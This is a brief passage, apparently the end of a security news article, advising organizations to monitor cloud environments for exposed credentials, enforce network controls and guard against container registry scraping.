To mitigate such threats, it's recommended that organizations monitor their cloud environments for scattered credentials, enforce network controls to prevent access to production servers, and safeguard against container registry scraping.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#mac